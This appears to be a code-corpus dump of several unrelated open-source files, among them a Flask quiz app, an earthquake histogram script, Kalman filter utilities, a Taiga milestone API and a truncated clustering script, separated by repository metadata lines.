"""Odczytanie wszystkich błędów formularza i przygotowanie komunikatów""" for field, errors in form.errors.items(): for error in errors: if type(error) is list: error = error[0] flash("Błąd: {}. Pole: {}".format( error, getattr(form, field).label.text)) @app.route('/dodaj', methods=['GET', 'POST']) def dodaj(): """Dodawanie pytań i odpowiedzi""" form = DodajForm() if form.validate_on_submit(): odp = form.odpowiedzi.data p = Pytanie(pytanie=form.pytanie.data, odpok=odp[int(form.odpok.data)]) p.save() for o in odp: inst = Odpowiedz(pnr=p.id, odpowiedz=o) inst.save() flash("Dodano pytanie: {}".format(form.pytanie.data)) return redirect(url_for("lista")) elif request.method == 'POST': flash_errors(form) return render_template("dodaj.html", form=form, radio=list(form.odpok)) def get_or_404(pid): """Pobranie i zwrócenie obiektu z bazy lub wywołanie szablonu 404.html""" try: p = Pytanie.select().annotate(Odpowiedz).where(Pytanie.id == pid).get() return p except Pytanie.DoesNotExist: abort(404) @app.errorhandler(404) def page_not_found(e): """Zwrócenie szablonu 404.html w przypadku nie odnalezienia strony""" return render_template('404.html'), 404 @app.route('/edytuj/<int:pid>', methods=['GET', 'POST']) def edytuj(pid): """Edycja pytania o identyfikatorze pid i odpowiedzi""" p = get_or_404(pid) form = DodajForm() if form.validate_on_submit(): odp = form.odpowiedzi.data p.pytanie = form.pytanie.data p.odpok = odp[int(form.odpok.data)] p.save() for i, o in enumerate(p.odpowiedzi): o.odpowiedz = odp[i] o.save() flash("Zaktualizowano pytanie: {}".format(form.pytanie.data)) return redirect(url_for("lista")) elif request.method == 'POST': flash_errors(form) for i in range(3): if p.odpok == p.odpowiedzi[i].odpowiedz: p.odpok = i break form = DodajForm(obj=p) return render_template("edytuj.html", form=form, radio=list(form.odpok)) @app.route('/usun/<int:pid>', methods=['GET', 'POST']) def usun(pid): """Usunięcie pytania o identyfikatorze pid""" p = get_or_404(pid) if request.method == 'POST': flash('Usunięto pytanie {0}'.format(p.pytanie), 'sukces') p.delete_instance(recursive=True) return redirect(url_for('index')) return render_template("pytanie_usun.html", pytanie=p)
mit
5,689,004,494,325,511,000
30.236641
79
0.611193
false
PyQuake/earthquakemodels
code/runExperiments/histogramMagnitude.py
1
1982
import matplotlib.pyplot as plt import models.model as model import earthquake.catalog as catalog from collections import OrderedDict def histogramMagnitude(catalog_, region): """ Creates the histogram of magnitudes by a given region. Saves the histogram to the follwing path ./code/Zona2/histograms/'+region+'/Magnitude Histogram of ' + str(year) + " " + region + '.png' Where region, year are given by the application From 2000 to 2011 """ definition = model.loadModelDefinition('../params/' + region + '.txt') catalogFiltred = catalog.filter(catalog_, definition) year = 2000 while(year < 2012): data = dict() for i in range(len(catalogFiltred)): if catalogFiltred[i]['year'] == year and catalogFiltred[i]['lat'] > 34.8 and catalogFiltred[i][ 'lat'] < 37.05 and catalogFiltred[i]['lon'] > 138.8 and catalogFiltred[i]['lon'] < 141.05: data[catalogFiltred[i]['mag']] = data.get(catalogFiltred[i]['mag'], 0) + 1 b = OrderedDict(sorted(data.items())) plt.title('Histogram of ' + str(year) + " " + region) plt.bar(range(len(data)), b.values(), align='center') plt.xticks(range(len(data)), b.keys(), rotation=25) # print(b) axes = plt.gca() plt.savefig( '../Zona2/histograms/'+region+'/Magnitude Histogram of ' + str(year) + " " + region + '.png') del data year += 1 def main(): """ Calls function to plot a hitogram of magnitudes by region, based on JMA catalog """ catalog_ = catalog.readFromFile('../data/jmacat_2000_2013.dat') region = "Kanto" histogramMagnitude(catalog_, region) region = "Kansai" histogramMagnitude(catalog_, region) region = "Tohoku" histogramMagnitude(catalog_, region) region = "EastJapan" histogramMagnitude(catalog_, region) if __name__ == "__main__": main()
bsd-3-clause
2,488,482,629,625,943,600
35.036364
140
0.604945
false
Skyscanner/pages
test/utils/hamcrest_matchers.py
1
2357
############################################################################ # Copyright 2015 Skyscanner Ltd # # # # Licensed under the Apache License, Version 2.0 (the "License"); # # you may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. # ############################################################################ from hamcrest.core.base_matcher import BaseMatcher from selenium.common.exceptions import TimeoutException from pages.page import Page DEFAULT_POLLING_TIME = 0.5 DEFAULT_TIMEOUT = 25 class PageIsLoaded(BaseMatcher): def __init__(self, timeout): BaseMatcher.__init__(self) self.timeout = timeout self.polling = DEFAULT_POLLING_TIME self.page_name = None def _matches(self, page): self.page_name = page.name if isinstance(page, Page): try: page.wait_until_loaded(self.timeout, self.polling) return True except TimeoutException: return False def describe_to(self, description): description.append_text("Expected page {0} to load within {1} ms".format(self.page_name, str(self.timeout))) def describe_mismatch(self, item, mismatch_description): mismatch_description.append_text('page load timed out.') def with_timeout(self, timeout): self.timeout = timeout return self def with_polling(self, polling): self.polling = polling return self def is_loaded(timeout=30): return PageIsLoaded(timeout)
apache-2.0
-6,174,321,162,460,390,000
39.637931
116
0.517183
false
socrocket/trap-gen
processors/LEON2/LEONCoding.py
1
5555
################################################################################ # # _/_/_/_/_/ _/_/_/ _/ _/_/_/ # _/ _/ _/ _/_/ _/ _/ # _/ _/ _/ _/ _/ _/ _/ # _/ _/_/_/ _/_/_/_/ _/_/_/ # _/ _/ _/ _/ _/ _/ # _/ _/ _/ _/ _/ _/ # # @file LEONCoding.py # @brief This file is part of the TRAP example processors. # @details Instruction coding definition file for the LEON2. # @author Luca Fossati # @date 2008-2013 Luca Fossati # @copyright # # This file is part of TRAP. # # TRAP is free software; you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this program; if not, write to the # Free Software Foundation, Inc., # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # or see <http://www.gnu.org/licenses/>. # # (c) Luca Fossati, fossati@elet.polimi.it, fossati.l@gmail.com # ################################################################################ import trap #--------------------------------------------------------- # Instruction Encoding #--------------------------------------------------------- # Lets now start with defining the instructions, i.e. their bitstring and # mnemonic and their behavior. Note the zero* field: it is a special identifier and it # means that all those bits have value 0; the same applies for one* # As stated in page 44 of "The SPARC Architecture Manual V8" there are # mainly 6 different format types # Call instruction format call_format = trap.MachineCode([('op', 2), ('disp30', 30)]) call_format.setBitfield('op', [0, 1]) # Branch and sethi instructions format b_sethi_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op2', 3), ('imm22', 22)]) b_sethi_format1.setBitfield('op', [0, 0]) b_sethi_format1.setVarField('rd', ('REGS', 0), 'out') b_sethi_format2 = trap.MachineCode([('op', 2), ('a', 1), ('cond', 4), ('op2', 3), ('disp22', 22)]) b_sethi_format2.setBitfield('op', [0, 0]) # Memory instruction format mem_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)]) mem_format1.setBitfield('op', [1, 1]) mem_format1.setVarField('rs1', ('REGS', 0), 'in') mem_format1.setVarField('rs2', ('REGS', 0), 'in') mem_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)]) mem_format2.setBitfield('op', [1, 1]) mem_format2.setVarField('rs1', ('REGS', 0), 'in') # Store Barrier format stbar_format = trap.MachineCode([('op', 2), ('zero', 5), ('op3', 6), ('rs1', 5), ('zero', 14)]) stbar_format.setBitfield('op', [1, 0]) stbar_format.setBitfield('op3', [1, 0, 1, 0, 0, 0]) stbar_format.setBitfield('rs1', [0, 1, 1, 1, 1]) # logical and remainig instructions format dpi_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)]) dpi_format1.setBitfield('op', [1, 0]) dpi_format1.setVarField('rd', ('REGS', 0), 'out') dpi_format1.setVarField('rs1', ('REGS', 0), 'in') dpi_format1.setVarField('rs2', ('REGS', 0), 'in') dpi_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)]) dpi_format2.setBitfield('op', [1, 0]) dpi_format2.setVarField('rd', ('REGS', 0), 'out') dpi_format2.setVarField('rs1', ('REGS', 0), 'in') # Format for reading special instructions read_special_format = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('asr', 5), ('zero', 14)]) read_special_format.setBitfield('op', [1, 0]) read_special_format.setVarField('rd', ('REGS', 0), 'out') # Format for writing special instructions write_special_format1 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('zero', 9), ('rs2', 5)]) write_special_format1.setBitfield('op', [1, 0]) write_special_format1.setVarField('rs1', ('REGS', 0), 'in') write_special_format1.setVarField('rs2', ('REGS', 0), 'in') write_special_format2 = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('one', 1), ('simm13', 13)]) write_special_format2.setBitfield('op', [1, 0]) write_special_format2.setVarField('rs1', ('REGS', 0), 'in') # Trap on integer condition code format ticc_format1 = trap.MachineCode([('op', 2), ('reserved1', 1), ('cond', 4), ('op3', 6), ('rs1', 5), ('zero', 1), ('asi', 8), ('rs2', 5)]) ticc_format1.setBitfield('op', [1, 0]) ticc_format1.setVarField('rs1', ('REGS', 0), 'in') ticc_format1.setVarField('rs2', ('REGS', 0), 'in') ticc_format2 = trap.MachineCode([('op', 2), ('reserved1', 1), ('cond', 4), ('op3', 6), ('rs1', 5), ('one', 1), ('reserved2', 6), ('imm7', 7)]) ticc_format2.setBitfield('op', [1, 0]) ticc_format2.setVarField('rs1', ('REGS', 0), 'in') # Coprocessor of fpu instruction format coprocessor_format = trap.MachineCode([('op', 2), ('rd', 5), ('op3', 6), ('rs1', 5), ('opf', 9), ('rs2', 5)]) coprocessor_format.setBitfield('op', [1, 0]) coprocessor_format.setVarField('rd', ('REGS', 0), 'out') coprocessor_format.setVarField('rs1', ('REGS', 0), 'in') coprocessor_format.setVarField('rs2', ('REGS', 0), 'in')
gpl-3.0
6,424,995,192,659,470,000
45.680672
142
0.576598
false
bdang2012/taiga-back-casting
taiga/projects/milestones/api.py
1
6149
# Copyright (C) 2014-2015 Andrey Antukh <niwi@niwi.be> # Copyright (C) 2014-2015 Jesús Espino <jespinog@gmail.com> # Copyright (C) 2014-2015 David Barragán <bameda@dbarragan.com> # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. from django.apps import apps from django.db.models import Prefetch from taiga.base import filters from taiga.base import response from taiga.base.decorators import detail_route from taiga.base.api import ModelCrudViewSet, ModelListViewSet from taiga.base.api.utils import get_object_or_404 from taiga.base.utils.db import get_object_or_none from taiga.projects.notifications.mixins import WatchedResourceMixin, WatchersViewSetMixin from taiga.projects.history.mixins import HistoryResourceMixin from taiga.projects.votes.utils import attach_total_voters_to_queryset, attach_is_voter_to_queryset from taiga.projects.notifications.utils import attach_watchers_to_queryset, attach_is_watcher_to_queryset from . import serializers from . import models from . import permissions import datetime class MilestoneViewSet(HistoryResourceMixin, WatchedResourceMixin, ModelCrudViewSet): serializer_class = serializers.MilestoneSerializer permission_classes = (permissions.MilestonePermission,) filter_backends = (filters.CanViewMilestonesFilterBackend,) filter_fields = ("project", "closed") queryset = models.Milestone.objects.all() def list(self, request, *args, **kwargs): res = super().list(request, *args, **kwargs) self._add_taiga_info_headers() return res def _add_taiga_info_headers(self): try: project_id = int(self.request.QUERY_PARAMS.get("project", None)) project_model = apps.get_model("projects", "Project") project = get_object_or_none(project_model, id=project_id) except TypeError: project = None if project: opened_milestones = project.milestones.filter(closed=False).count() closed_milestones = project.milestones.filter(closed=True).count() self.headers["Taiga-Info-Total-Opened-Milestones"] = opened_milestones self.headers["Taiga-Info-Total-Closed-Milestones"] = closed_milestones def get_queryset(self): qs = super().get_queryset() # Userstories prefetching UserStory = apps.get_model("userstories", "UserStory") us_qs = UserStory.objects.prefetch_related("role_points", "role_points__points", "role_points__role") us_qs = us_qs.select_related("milestone", "project", "status", "owner", "assigned_to", "generated_from_issue") us_qs = self.attach_watchers_attrs_to_queryset(us_qs) if self.request.user.is_authenticated(): us_qs = attach_is_voter_to_queryset(self.request.user, us_qs) us_qs = attach_is_watcher_to_queryset(self.request.user, us_qs) qs = qs.prefetch_related(Prefetch("user_stories", queryset=us_qs)) # Milestones prefetching qs = qs.select_related("project", "owner") qs = self.attach_watchers_attrs_to_queryset(qs) qs = qs.order_by("-estimated_start") return qs def pre_save(self, obj): if not obj.id: obj.owner = self.request.user super().pre_save(obj) @detail_route(methods=['get']) def stats(self, request, pk=None): milestone = get_object_or_404(models.Milestone, pk=pk) self.check_permissions(request, "stats", milestone) total_points = milestone.total_points milestone_stats = { 'name': milestone.name, 'estimated_start': milestone.estimated_start, 'estimated_finish': milestone.estimated_finish, 'total_points': total_points, 'completed_points': milestone.closed_points.values(), 'total_userstories': milestone.user_stories.count(), 'completed_userstories': len([us for us in milestone.user_stories.all() if us.is_closed]), 'total_tasks': milestone.tasks.all().count(), 'completed_tasks': milestone.tasks.all().filter(status__is_closed=True).count(), 'iocaine_doses': milestone.tasks.filter(is_iocaine=True).count(), 'days': [] } current_date = milestone.estimated_start sumTotalPoints = sum(total_points.values()) optimal_points = sumTotalPoints milestone_days = (milestone.estimated_finish - milestone.estimated_start).days optimal_points_per_day = sumTotalPoints / milestone_days if milestone_days else 0 while current_date <= milestone.estimated_finish: milestone_stats['days'].append({ 'day': current_date, 'name': current_date.day, 'open_points': sumTotalPoints - sum(milestone.closed_points_by_date(current_date).values()), 'optimal_points': optimal_points, }) current_date = current_date + datetime.timedelta(days=1) optimal_points -= optimal_points_per_day return response.Ok(milestone_stats) class MilestoneWatchersViewSet(WatchersViewSetMixin, ModelListViewSet): permission_classes = (permissions.MilestoneWatchersPermission,) resource_model = models.Milestone
agpl-3.0
812,098,269,733,922,800
41.986014
109
0.650887
false
DStauffman/dstauffman
dstauffman/estimation/kalman.py
1
8438
r""" Functions related to Kalman Filter analysis. Notes ----- #. Written by David C. Stauffer in April 2019. """ #%% Imports import doctest import unittest from dstauffman import HAVE_NUMPY from dstauffman.numba import ncjit from dstauffman.estimation.linalg import mat_divide if HAVE_NUMPY: import numpy as np #%% Functions - calculate_kalman_gain def calculate_kalman_gain(P, H, R, *, use_inverse=False, return_innov_cov=False): r""" Calculates K, the Kalman Gain matrix. Parameters ---------- P : (N, N) ndarray Covariance Matrix H : (A, B) ndarray Measurement Update Matrix R : () ndarray Measurement Noise Matrix use_inverse : bool, optional Whether to explicitly calculate the inverse or not, default is False Returns ------- K : (N, ) ndarray Kalman Gain Matrix Pz : (N, N) ndarray Innovation Covariance Matrix Notes ----- #. Written by David C Stauffer in December 2018. Examples -------- >>> from dstauffman.estimation import calculate_kalman_gain >>> import numpy as np >>> P = 1e-3 * np.eye(5) >>> H = np.array([[1, 0, 0], [0, 1, 0], [0, 0, 1], [0.5, 0.5, 0.5], [0, 0, 0.1]]).T >>> R = 0.5 * np.eye(3) >>> K = calculate_kalman_gain(P, H, R) """ # calculate the innovation covariance Pz = H @ P @ H.T + R if use_inverse: # explicit version with inverse K = (P @ H.T) @ np.linalg.inv(Pz) else: # implicit solver K = mat_divide(Pz.T, (P @ H.T).T).T # return desired results if return_innov_cov: return (K, Pz) return K @ncjit def calculate_kalman_gain_opt(P, H, R): r"""Calculate the Kalman gain, in a way optimized for use with numba.""" Pz = H @ P @ H.T + R K = mat_divide(Pz.T, (P @ H.T).T).T return (K, Pz) #%% Functions - calculate_prediction @ncjit def calculate_prediction(H, state, const=None): r""" Calculates u, the measurement prediction. Parameters ---------- H : (A, B) ndarray Measurement Update matrix state : (A, ) ndarray State vector const : (A, ) ndarray, optional Constant state vector offsets Returns ------- (A, ) ndarray Delta state vector Notes ----- #. Written by David C. Stauffer in September 2020. Examples -------- >>> from dstauffman.estimation import calculate_prediction >>> import numpy as np >>> H = np.array([[1., 0.], [0., 1.], [0., 0.]]) >>> state = np.array([1e-3, 5e-3]) >>> u_pred = calculate_prediction(H, state) >>> print(u_pred) # doctest: +NORMALIZE_WHITESPACE [0.001 0.005 0. ] """ if const is None: return H @ state return H @ (state + const) #%% Functions - calculate_innovation @ncjit def calculate_innovation(u_meas, u_pred): r""" Calculates z, the Kalman Filter innovation. Parameters ---------- u_meas : (A, ) ndarray Measured state vector u_pred : (A, ) ndarray Predicted state vector Returns ------- (A, ) ndarray Kalman Filter innovation Notes ----- #. Written by David C. Stauffer in September 2020. Examples -------- >>> from dstauffman.estimation import calculate_innovation >>> import numpy as np >>> u_meas = np.array([1., 2.1, -3.]) >>> u_pred = np.array([1.1, 2.0, -3.1]) >>> z = calculate_innovation(u_meas, u_pred) >>> with np.printoptions(precision=8): ... print(z) # doctest: +NORMALIZE_WHITESPACE [-0.1 0.1 0.1] """ return u_meas - u_pred #%% Functions - calculate_normalized_innovation @ncjit def calculate_normalized_innovation(z, Pz, use_inverse=False): r""" Calculates nu, the Normalized Kalman Filter Innovation. Parameters ---------- z : (A, ) ndarray Kalman Filter innovation Pz : (A, A) ndarray Kalman Filter innovation covariance use_inverse : bool, optional Whether to explicitly calculate the inverse or not, default is False Returns ------- (A, ) ndarray Normalized innovation Notes ----- #. Written by David C. Stauffer in September 2020. Examples -------- >>> from dstauffman.estimation import calculate_normalized_innovation >>> import numpy as np >>> z = np.array([0.1, 0.05, -0.2]) >>> Pz = np.array([[0.1, 0.01, 0.001], [0.01, 0.1, 0.001], [0., 0., 0.2]]) >>> nu = calculate_normalized_innovation(z, Pz) >>> with np.printoptions(precision=8): ... print(nu) # doctest: +NORMALIZE_WHITESPACE [ 0.96868687 0.41313131 -1. ] """ if use_inverse: return np.linalg.inv(Pz) @ z return mat_divide(Pz, z) #%% Functions - calculate_delta_state @ncjit def calculate_delta_state(K, z): r""" Calculates dx, the delta state for a given measurement. Parameters ---------- K : (A, B) ndarray Kalman Gain Matrix z : (A, ) ndarray Kalman Filter innovation Notes ----- #. Written by David C. Stauffer in September 2020. Examples -------- >>> from dstauffman.estimation import calculate_delta_state >>> import numpy as np >>> K = np.array([[0.1, 0.01, 0.001], [0.01, 0.1, 0.001], [0., 0., 0.2]]) >>> z = np.array([0.1, 0.05, -0.2]) >>> dx = calculate_delta_state(K, z) >>> with np.printoptions(precision=8): ... print(dx) # doctest: +NORMALIZE_WHITESPACE [ 0.0103 0.0058 -0.04 ] """ return K @ z #%% Functions - propagate_covariance def propagate_covariance(P, phi, Q, *, gamma=None, inplace=True): r""" Propagates the covariance forward in time. Parameters ---------- P : Covariance matrix phi : State transition matrix Q : Process noise matrix gamma : Shaping matrix? inplace : bool, optional, default is True Whether to update the value inplace or as a new output Returns ------- (N, N) ndarray Updated covariance matrix Notes ----- #. Written by David C. Stauffer in December 2018. #. Updated by David C. Stauffer in July 2020 to have inplace option. Examples -------- >>> from dstauffman.estimation import propagate_covariance >>> import numpy as np >>> P = 1e-3 * np.eye(6) >>> phi = np.diag([1., 1, 1, -1, -1, -1]) >>> Q = np.diag([1e-3, 1e-3, 1e-5, 1e-7, 1e-7, 1e-7]) >>> propagate_covariance(P, phi, Q) >>> print(P[0, 0]) 0.002 """ if gamma is None: out = phi @ P @ phi.T + Q else: out = phi @ P @ phi.T + gamma @ Q @ gamma.T if inplace: P[:] = out else: return out @ncjit def propagate_covariance_opt(P, phi, Q, gamma=None): r"""Propagate the covariance in time, in a way optimized for use with numba.""" if gamma is None: P[:] = phi @ P @ phi.T + Q else: P[:] = phi @ P @ phi.T + gamma @ Q @ gamma.T #%% Functions - update_covariance def update_covariance(P, K, H, *, inplace=True): r""" Updates the covariance for a given measurement. Parameters ---------- P : (N, N) ndarray Covariance Matrix K : (N, ) ndarray Kalman Gain Matrix H : (A, N) ndarray Measurement Update Matrix inplace : bool, optional, default is True Whether to update the value inplace or as a new output Returns ------- P_out : (N, N) ndarray Updated Covariance Matrix Notes ----- #. Written by David C Stauffer in December 2018. #. Updated by David C. Stauffer in July 2020 to have inplace option. Examples -------- >>> from dstauffman.estimation import update_covariance >>> import numpy as np >>> P = 1e-3 * np.eye(6) >>> P[0, -1] = 5e-2 >>> K = np.ones((6, 3)) >>> H = np.hstack((np.eye(3), np.eye(3))) >>> update_covariance(P, K, H) >>> print(P[-1, -1]) -0.05 """ out = (np.eye(*P.shape) - K @ H) @ P if inplace: P[:] = out else: return out @ncjit def update_covariance_opt(P, K, H): r"""Propagate the covariance in time, in a way optimized for use with numba.""" P[:] = (np.eye(*P.shape) - K @ H) @ P #%% Unit Test if __name__ == '__main__': unittest.main(module='dstauffman.tests.test_estimation_kalman', exit=False) doctest.testmod(verbose=False)
lgpl-3.0
-4,143,109,021,988,057,000
24.263473
87
0.567907
false
tktrungna/leetcode
Python/range-sum-query-immutable.py
1
1146
""" QUESTION: Given an integer array nums, find the sum of the elements between indices i and j (i < j), inclusive. Example: Given nums = [-2, 0, 3, -5, 2, -1] sumRange(0, 2) -> 1 sumRange(2, 5) -> -1 sumRange(0, 5) -> -3 Note: You may assume that the array does not change. There are many calls to sumRange function. ANSWER: sum accumulation """ class NumArray(object): def __init__(self, nums): """ initialize your data structure here. :type nums: List[int] """ self.nums = nums self.sum = [0]*len(self.nums) for i in xrange(len(nums)): self.sum[i] = nums[i] if i == 0 else self.sum[i-1]+nums[i] def sumRange(self, i, j): """ sum of elements nums[i..j], inclusive. :type i: int :type j: int :rtype: int """ return self.sum[j]-self.sum[i]+self.nums[i] # Your NumArray object will be instantiated and called as such: # numArray = NumArray(nums) # numArray.sumRange(0, 1) # numArray.sumRange(1, 2) if __name__ == '__main__': numArray = NumArray([-2, 0, 3, -5, 2, -1]) print numArray.sumRange(0, 1)
mit
-799,236,257,874,062,700
22.875
101
0.578534
false
stephenliu1989/HK_DataMiner
hkdataminer/Nystrom_code/microToMacroBySHC_v2.0b.py
1
41931
#!/usr/bin/env python ####################################################### #Written by Daniel Silva #Based in the original SHC code from Yuan YAO and Xuhui Huang: # Proceedings of the Pacific Symposium on Biocomputing, 15, 228-239, (2010) # #Intended to be used in the SimTK project #Ver. 1.5b 21/Apr/2011 ####################################################### import optparse import sys import linecache import scipy.io import numpy as np #import colorsys from pylab import * from numpy import * from scipy import * from scipy.sparse import * from scipy.sparse.linalg import * from scipy.linalg import eig from scipy.interpolate import interp1d from scipy.sparse.linalg.eigen.arpack import * def version(): print "(OUTPUT) Python SHC ver 2.01b" #def licence(): def main(): version() # licence() p = optparse.OptionParser() p.add_option('--outMicroCountMatrixName', '-c', default="microstateCountMatrix.mtx") p.add_option('--lagstep', '-l', default="1") p.add_option('--headDir', '-d', default="./") p.add_option('--trajlist', '-t', default="-1") p.add_option('--plevelsFile', '-p', default="plevels.shc") p.add_option('--outMacrostateAssignementsMap', '-s', default="macrostateMap.map") p.add_option('--writeMacroAssignments', '-w', default="0") p.add_option('--optimumMacrostateSize', '-o', default="0.01") p.add_option('--maximumAssignIterations', '-i', default="10") p.add_option('--removeBarelyConnectedMicros', '-r', default="0") p.add_option('--writeTCMtxt', '-x', default="0") p.add_option('--scanModeTopDensity', '-a', default="0.0") p.add_option('--inputMatrix', '-m', default="") p.add_option('--outFlowGraphName', '-f', default="macroFlowGraph.dot") p.add_option('--bJumpWindow', '-j', default="0") p.add_option('--whichGap', '-g', default="1") options, arguments = p.parse_args() outMicroCountMatrixName = (options.outMicroCountMatrixName) tLag = int(options.lagstep) headDir = (options.headDir) trajlistfiles = (options.trajlist) pLevelsFilename = (options.plevelsFile) outMacrostateAssignementsMap = (options.outMacrostateAssignementsMap) optimumMacrostateSize = float(options.optimumMacrostateSize) writeMAssignments = int(options.writeMacroAssignments) maximumAssignIterations = int(options.maximumAssignIterations) numRemoveBarelyConnectedMicros = int(options.removeBarelyConnectedMicros) writeTCMtxt = int(options.writeTCMtxt) scanModeTopDensity = float(options.scanModeTopDensity) inputMatrix = (options.inputMatrix) outFlowGraphName = (options.outFlowGraphName) bJumpWindow = int(options.bJumpWindow) chooseGap = int(options.whichGap) #if (len(inputMatrix) == 0 ): # originalMicrosCountM= getMicroTransitionsFromAssignements(tLag, headDir, trajlistfiles, bJumpWindow) #else: # print "(OUTPUT) ", ("Reading data from TCM file: \"%s\" ", inputMatrix) # if ( linecache.getline(inputMatrix, 1).strip() == "%%MatrixMarket matrix coordinate integer general"): # print "(OUTPUT) ", ("Detected sparce matrix in the Matrix Market format") # originalMicrosCountM = scipy.io.mmread(inputMatrix) # else: # print "(OUTPUT) ", ("Detected matrix in raw txt format") # originalMicrosCountM = genfromtxt(inputMatrix) # originalMicrosCountM = lil_matrix(originalMicrosCountM) originalMicrosCountM = scipy.io.mmread(inputMatrix) #The code is made to use a float matrix, even if the input (transitions) are integers. This way is just convinient to avoid errors due to loosing floats originalMicrosCountM = originalMicrosCountM.tocsc()/1.0 writeCountMatrix(originalMicrosCountM, outMicroCountMatrixName, "Writing microstates transition count matrix", writeTCMtxt) if (numRemoveBarelyConnectedMicros > 0): originalMicrosCountM = removeBarelyConnectedMicros(originalMicrosCountM, numRemoveBarelyConnectedMicros) connectedMicrosCountM, connectedMicrosIndex = getConnectedMicrostates(originalMicrosCountM) writeCountMatrix(connectedMicrosCountM, ("%s_connected" % outMicroCountMatrixName), "Writing connected microstates transition count matrix", 0) connectedMicrosCountM_X = csc_matrix(connectedMicrosCountM + connectedMicrosCountM.conj().transpose())/2 ; microstate_size = connectedMicrosCountM.sum(axis=1) cumulativeSumOfRows = cumulativeDesityFunctionOfHeightFilter(microstate_size) pLevels=[] if ( scanModeTopDensity > 0.0 ): pLevels = scanPlevels(cumulativeSumOfRows, connectedMicrosCountM_X, microstate_size, 0.01, 0.01, scanModeTopDensity, chooseGap) else: pLevels = readPlevels(pLevelsFilename, cumulativeSumOfRows) clusters = zeros(len(pLevels), int) levels = [] levelsLine="" for i in range (0, len(pLevels)): if ((sum(cumulativeSumOfRows<=pLevels[i])) > 2): #Detect and remove density levels with <10 microstate levels.append(sum(cumulativeSumOfRows<=pLevels[i])) levelsLine += ("%1.3f " % pLevels[i]) else: print "(OUTPUT) ", ("Density level at \"%1.3f\" is empty or have to few microstates (<2), it was removed it from the analysis"% (pLevels[i])) print "(OUTPUT) ", ("**SHC analysis will use %d density levels: %s" % (len(levels), levelsLine)) (aBettis, specGaps) = apBetti(connectedMicrosCountM_X, microstate_size, levels) for i in range (0, len(levels)): if (chooseGap < 1): print "(OUTPUT) ", ("WARNING: The spectral gap choosen (1st, 2nd, etc) cannot have a value less than 1, automaticaly changing the gap (-g) to 1") chooseGap=1 if (chooseGap > 1): print "(OUTPUT) ", ("WARNING:You are using an spectral gap ( ) different to the 1st. Is this really what you want to do?") clusters[i] = aBettis[i][chooseGap-1] superLevels=superLevelSet(microstate_size, levels, clusters) #0 is IDs and 1 is IGs (adja, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) = superMapper(connectedMicrosCountM_X, superLevels) (cptLocalMax, cptGradFlow, cptEquilibriumEQ) = flowGrad(adja, levelIdx, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter) writeFlowGraph(cptGradFlow, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, superLevels, outFlowGraphName, pLevels) (ci, csize, fassign, T, Qmax, id_fuzzy) = optimumAssignment(connectedMicrosCountM_X, cptEquilibriumEQ, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, maximumAssignIterations) writeMacrostateMap(outMacrostateAssignementsMap, originalMicrosCountM.shape[0], ci, connectedMicrosIndex) if (writeMAssignments ==1): writeMacroAssignments(tLag, headDir, trajlistfiles, ci, connectedMicrosIndex, originalMicrosCountM.shape[0]) print "(OUTPUT) ", ("Done with SHC!") def scanPlevels(cumulativeSumOfRows, connectedMicrosCountM_X, microstate_size, start, incr, end, chooseGap): print "(OUTPUT) ", "Will perform a scan to discover optimum density levels for SHC (EXPERIMENTAL)" clustersScan = zeros(1, int) pLevels=[] pLevelsScan=[] pLevelsScan.append(0) pLevelSGQuality=[] pLevelNumMacro=[] tmpMaxNumMacro=0 tmpMaxGapQuality=0 testLevels = np.arange(start,end,incr) for i in testLevels: levelsScan = [] pLevelsScan[0] = i specGapQuality=0 print "(OUTPUT) ", ("Testing Density level: \"%1.3f\" " % pLevelsScan[0]) if ((sum(cumulativeSumOfRows<=pLevelsScan[0])) > 1+chooseGap): levelsScan.append(sum(cumulativeSumOfRows<=pLevelsScan[0])) (aBettis, specGaps) = apBetti(connectedMicrosCountM_X, microstate_size, levelsScan) clustersScan[0] = aBettis[0][0] superLevels=superLevelSet(microstate_size, levelsScan, clustersScan) #0 is IDs and 1 is IGs (adja, nodeInfoLevel, nodeInfoLevelSize, nodeInfoSet, nodeInfoFilter, levelIdx, ci, csize) = superMapper(connectedMicrosCountM_X, superLevels) print specGaps specGapQuality = specGaps[0][chooseGap-1] - specGaps[0][chooseGap] if ( (len(csize[0])) > tmpMaxNumMacro): tmpMaxNumMacro = len(csize[0]) tmpMaxGapQuality = specGapQuality 